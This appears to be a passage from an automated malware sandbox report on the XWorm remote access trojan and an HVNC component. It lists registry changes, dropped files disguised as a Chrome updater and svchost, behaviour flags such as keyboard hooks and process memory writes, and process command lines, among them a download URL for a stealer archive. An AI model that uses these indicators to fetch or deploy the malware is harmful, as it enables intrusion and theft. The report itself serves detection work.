| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000100000014000000494c200601000400280010001000ffffffff2110ffffffffffffffff424d36000000000000003600000028000000100000004000000001002000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000001000000040000001c0000000100000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Downloads" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133524141059344388" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (2).zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-3.1-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-RAT-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\xworm5.5-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe\:Zone.Identifier:$DATA | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Xworm-RAT-V3.1-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f73cb8,0x7ff9a5f73cc8,0x7ff9a5f73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
